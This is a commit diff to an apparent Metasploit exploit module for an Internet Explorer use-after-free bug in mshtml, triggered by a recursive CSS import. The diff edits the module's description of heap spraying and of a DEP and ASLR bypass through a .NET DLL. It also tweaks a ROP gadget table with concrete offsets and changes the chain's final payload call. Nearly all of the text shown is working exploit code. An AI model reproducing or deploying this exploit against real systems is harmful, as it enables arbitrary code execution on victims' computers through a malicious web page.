minor clean ups
git-svn-id: file:///home/svn/framework3/trunk@11397 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
1407d7f1d5
commit
44c8a71dcf
|
@ -33,6 +33,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
|
||||
import, a C++ object is deleted and later reused. This leads to arbitrary
|
||||
code execution.
|
||||
|
||||
This exploit utilizes a combination of heap spraying and the
|
||||
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
|
||||
opt-in to ASLR. As such, this module should be reliable on all Windows
|
||||
versions.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -288,6 +293,7 @@ EOS
|
|||
|
||||
elsif request.uri =~ /\.dll$/
|
||||
print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
|
||||
|
||||
# Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
|
||||
# use it's contents ...
|
||||
ibase = (0x2000 | rand(0x8000)) << 16
|
||||
|
@ -330,11 +336,7 @@ EOS
|
|||
'xchg eax, esp / mov eax, [eax] / mov [esp], eax / ret' => 0x575b,
|
||||
'leave / ret' => 0x25e5,
|
||||
'ret' => 0x25e5+1,
|
||||
'mov eax, [eax] / ret' => 0x22a2,
|
||||
'mov [ecx], eax / xor eax, eax / pop esi / ret' => 0x360b9,
|
||||
|
||||
'call [ecx] / pop ebp / ret 0xc' => 0x1ec4,
|
||||
'push eax / ret' => 0x1d1e4,
|
||||
'pop eax / ret' => 0x5ba1,
|
||||
'pop ebx / ret' => 0x54c0,
|
||||
'pop ecx / ret' => 0x1e13,
|
||||
|
@ -342,7 +344,6 @@ EOS
|
|||
'pop edi / ret' => 0x2212,
|
||||
'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc' => 0x61f6,
|
||||
'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret' => 0x6154,
|
||||
'call [ecx]' => 0x1ec4
|
||||
}
|
||||
end
|
||||
|
||||
|
@ -389,7 +390,7 @@ EOS
|
|||
rop_stack << 'movsd / mov ebp, 0x458bffff / sbb al, 0x3b / ret'
|
||||
}
|
||||
# Execute the payload ;)
|
||||
rop_stack << 'call [ecx]'
|
||||
rop_stack << 'call [ecx] / pop ebp / ret 0xc'
|
||||
|
||||
rop_stack.map! { |e|
|
||||
if e.kind_of? String
|
||||
|
|
Loading…
Reference in New Issue